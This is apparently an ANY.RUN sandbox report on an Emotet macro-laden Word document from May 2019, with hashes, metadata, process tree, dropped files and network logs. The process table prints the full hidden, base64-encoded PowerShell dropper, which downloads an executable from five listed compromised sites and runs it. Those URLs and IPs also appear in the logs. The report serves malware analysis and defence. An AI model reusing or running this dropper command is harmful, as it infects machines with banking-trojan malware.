analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

871b16c31dcb7d2c79e54749c629070395f6519e55cf539c39952d39e283cecb

Full analysis: https://app.any.run/tasks/f2108682-c61d-415f-9f21-0d367d94ecf3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 13:30:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: bypass Developer orange, Subject: Liechtenstein, Author: Zackery Parker, Comments: solution Program card, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 08:57:00 2019, Last Saved Time/Date: Mon May 20 08:57:00 2019, Number of Pages: 1, Number of Words: 10, Number of Characters: 62, Security: 0
MD5:

C60991DEDB891E15CE9BE8513F65501A

SHA1:

1C929B7CE4C772F16C948B5D74BCA966F6D99E0B

SHA256:

871B16C31DCB7D2C79E54749C629070395F6519E55CF539C39952D39E283CECB

SSDEEP:

3072:r077HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfW22snSsR5B:I77HUUUUUUUUUUUUUUUUUUUT52VMW224

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3512)
    • Creates files in the user directory

      • powershell.exe (PID: 3512)
    • PowerShell script executed

      • powershell.exe (PID: 3512)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2160)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Manager: Hamill
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 71
Paragraphs: 1
Lines: 1
Company: Schuppe Inc
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 62
Words: 10
Pages: 1
ModifyDate: 2019:05:20 07:57:00
CreateDate: 2019:05:20 07:57:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: solution Program card
Keywords: -
Author: Zackery Parker
Subject: Liechtenstein
Title: bypass Developer orange
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2160"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\871b16c31dcb7d2c79e54749c629070395f6519e55cf539c39952d39e283cecb.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3512powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABUADcAXwA2ADQANQAzADMAPQAnAGMAXwA3ADQANQA3ADcAJwA7ACQATgAzADkANQBfAF8ANgA1ACAAPQAgACcAMgA0ACcAOwAkAG4AMAAyADIAXwA0ADEAPQAnAGMAMwA0ADgANgA3ADEAMQAnADsAJABrADgAMwA3AF8AMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATgAzADkANQBfAF8ANgA1ACsAJwAuAGUAeABlACcAOwAkAHIANQA4ADEAMAAzAD0AJwBWADEANAA1ADYANwBfACcAOwAkAE0AMgAxADQAMQA4AD0AJgAoACcAbgAnACsAJwBlAHcAJwArACcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAYABUAC4AVwBFAEIAQwBgAEwAYABJAGAARQBuAFQAOwAkAEIAMgA4ADgANgAwADMAPQAnAGgAdAB0AHAAOgAvAC8AcwBhAG0AaQBuAHAAcgBpAG4AdABlAHIALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHkAcgBrAHYAbQA0AHYAeQB5AF8AeQBiAGkAZABiAC0ANAAzADcANAA1ADIAMAA3AC8AQABoAHQAdABwADoALwAvAHMAYQBuAHQAdQBhAHIAaQBvAGEAcABhAHIAZQBjAGkAZABhAG0AbwBuAHQAZQBzAGUALgBjAG8AbQAuAGIAcgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvADcAagBuADkAcAA3AF8AcQBvAHUANAA5AGIAagBvAGQAeAAtADMAMwA5ADUAMwAvAEAAaAB0AHQAcAA6AC8ALwBzAGUAcgB3AGkAcwBrAG8AbgBzAG8AbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEoARQBzAGYAWQB1AGkAUABNAHYALwBAAGgAdAB0AHAAcwA6AC8ALwBwAHAAZABpAGEAbQBvAG4AZABzAC4AYwBvAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0ANAA1AHoAdgAwADMANwB1AGMAXwBuAGUAbgB0ADgANQBkAGEAYQBpAC0AMgA4ADIAMAA2ADcALwBAAGgAdAB0AHAAOgAvAC8AYQB3AG8AcgBsAGQAdABvAHUAcgBpAHMAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AMQBmAGMAagBjADgAXwBtADQAbABuAGoANwBmAGYAbgBnAC0ANwA1ADUAMQAwADAALwAnAC4AUwBQAGwAaQB0ACgAJwBAACcAKQA7ACQAVgAwADYAXwA0AF8ANQA9ACcATgA0ADEAOQA0ADYAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGsAOQA2ADgAOAAyADYAXwAgAGkAbgAgACQAQgAyADgAOAA2ADAAMwApAHsAdAByAHkAewAkAE0AMgAxADQAMQA4AC4AZABPAHcAbgBsAG8AYQBkAGYASQBMAGUAKAAkAGsAOQA2ADgAOAAyADYAXwAsACAAJABrADgAMwA3AF8AMAApADsAJAB6ADEAMQAwADQAXwA4ADgAPQAnAGIAMwA5ADgAOAA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAawA4ADMANwBfADAAKQAuAEwARQBOAGcAdABIACAALQBnAGUAIAAyADEAMgA1ADgAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQBJAHQAZQAnACsAJwBtACcAKQAgACQAawA4ADMANwBfADAAOwAkAGoANAA2ADUANAA5AD0AJwB2ADcAOAA4ADAAMQA5ADgAJwA7AGIAcgBlAGEAawA7ACQAaQAyAF8AOQAzADkAPQAnAEUANQA3ADgAOAA4ADgANAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABZADgAOAAyADgAMQA5AD0AJwBjADgAMgAxADEAMAAzADUAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 359
Read events
886
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2160WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR3F6D.tmp.cvr
MD5:
SHA256:
3512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B3NCQGUMEYVNXNIHY3EH.temp
MD5:
SHA256:
2160WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\92DADBD9.wmfwmf
MD5:12749EE7DA290892EEE06700CF24DA98
SHA256:40481E7A1708403333B431446E2801482DF48F5E18925AAB00415A8F42A1CF54
2160WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$1b16c31dcb7d2c79e54749c629070395f6519e55cf539c39952d39e283cecb.docpgc
MD5:F2FB8C2354BDE346735E404A48C8C268
SHA256:9C5654AFA2220927E888B47AB2F9B5DD6735E043CC5432D217D519D256A474FA
3512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134b16.TMPbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2160WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\300E844F.wmfwmf
MD5:02BBC7D518EEE6BA7D6A88446AE37236
SHA256:E30F4B5C13F7504F6A4BD48397C2FFA852D084644FFBF281F82B068E084FB3A7
2160WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:BA251333042F16D6AD80EE6B23C749C7
SHA256:C2C752D98CA4C5FF631BE254720CD87B07B6AB62110629056656BD11927AE90B
3512powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF
SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5
2160WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:3107227F47377D26DFEB4773A6AFB83A
SHA256:4EE8125788061B77C12B0342B95E5F66F95A1F848A3B39220512773F24BA77B3
2160WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\252B3204.wmfwmf
MD5:49D0A66574E5963A80B5C9318CB706B8
SHA256:FCDC2478839943645051800C5A7273BBC7C3759F9DC2F780FFCFF4E7FA6E5491
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3512
powershell.exe
GET
404
171.22.26.29:80
http://saminprinter.com/wp-includes/yrkvm4vyy_ybidb-43745207/
GB
xml
345 b
suspicious
3512
powershell.exe
GET
404
54.38.130.145:80
http://serwiskonsol.com/wp-content/JEsfYuiPMv/
FR
xml
345 b
unknown
3512
powershell.exe
GET
404
192.99.62.163:80
http://santuarioaparecidamontese.com.br/wp-includes/7jn9p7_qou49bjodx-33953/
CA
xml
345 b
suspicious
3512
powershell.exe
GET
404
199.250.205.232:80
http://aworldtourism.com/wp-includes/1fcjc8_m4lnj7ffng-755100/
US
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3512
powershell.exe
171.22.26.29:80
saminprinter.com
GB
suspicious
3512
powershell.exe
104.27.178.199:443
ppdiamonds.co
Cloudflare Inc
US
shared
3512
powershell.exe
54.38.130.145:80
serwiskonsol.com
OVH SAS
FR
unknown
3512
powershell.exe
192.99.62.163:80
santuarioaparecidamontese.com.br
OVH SAS
CA
unknown
3512
powershell.exe
199.250.205.232:80
aworldtourism.com
US
unknown

DNS requests

Domain
IP
Reputation
saminprinter.com
  • 171.22.26.29
suspicious
santuarioaparecidamontese.com.br
  • 192.99.62.163
suspicious
serwiskonsol.com
  • 54.38.130.145
unknown
ppdiamonds.co
  • 104.27.178.199
  • 104.27.179.199
suspicious
aworldtourism.com
  • 199.250.205.232
malicious

Threats

No threats detected
No debug info